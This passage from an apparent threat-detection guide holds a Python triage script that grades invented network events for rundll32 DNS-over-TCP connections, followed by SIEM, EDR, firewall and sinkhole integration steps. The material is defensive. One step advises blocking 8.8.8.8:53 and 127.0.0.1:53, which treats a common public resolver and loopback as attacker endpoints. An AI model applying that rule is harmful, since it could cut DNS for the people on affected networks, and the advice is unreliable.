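    return sorted(key for key, n in counts.items() if n >= threshold)


# Constructed sample events (invented, not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": "53", "Protocol": "udp"},   # none
    {"Computer": "WS01", "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": "53", "Protocol": "tcp"},   # critical
    {"Computer": "WS01", "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": "53", "Protocol": "tcp"},   # critical
    {"Computer": "WS01", "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": "53", "Protocol": "tcp"}, # critical
    {"Computer": "WS02", "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": "53", "Protocol": "tcp"},   # medium
    {"Computer": "WS03", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "1.1.1.1", "DestinationPort": "53", "Protocol": "tcp"},   # none
]


if __name__ == "__main__":
    for host, items in triage(SAMPLE_EVENTS).items():
        for conf, image, reason in items:
            print(f"{host} {conf:8s} {image}: {reason}")
    print("repeated:", repeated_attempts(SAMPLE_EVENTS))
```

Feeding the same records through this grader before they reach the alert queue gives the tiered output the tuning list asks for: WS01 surfaces as critical with three attempts from one image, WS02 lands in a review bucket, and the routine UDP resolution on WS01 never produces a row.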
Integration with Security Tools
SIEM Integration
- Import Sigma rules into Splunk, Elastic, or Microsoft Sentinel
- Configure SPL/KQL queries for continuous monitoring
- Set up alerting thresholds and escalation procedures
EDR Integration
- Deploy YARA/Sigma detection rules to endpoint agents
- Configure incident response automation for high-confidence detections
- Enable process tree visualization for parent-child relationship analysis
Firewall Integration
- Create firewall rules to block 8.8.8.8:53 and 127.0.0.1:53
- Enable logging for all connection attempts (even if blocked)
- Alert on repeated connection attempts indicating persistence
DNS Sinkhole
- Add known C2 domains to sinkhole blocklist
- Monitor for queries to C2 domains by suspicious processes
- Alert on sinkhole hits for rapid incident response
Metrics & Effectiveness Tracking
Track the following metrics to assess detection effectiveness:
- Detection Rate: Percentage of known infected systems detected
- Time to Detection: Average time from compromise to detection alert
- False Positive Rate: Percentage of benign alerts vs. true positives
- MTTR (Mean Time to Response): Average time from alert to incident response
- Coverage: Percentage of infrastructure covered by each detection method
Goal: Achieve 95%+ detection rate with <5% false positive rate within 30 days of deployment.
License
Detection rules are licensed under Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0).
Free to use in your environment, but not for commercial purposes.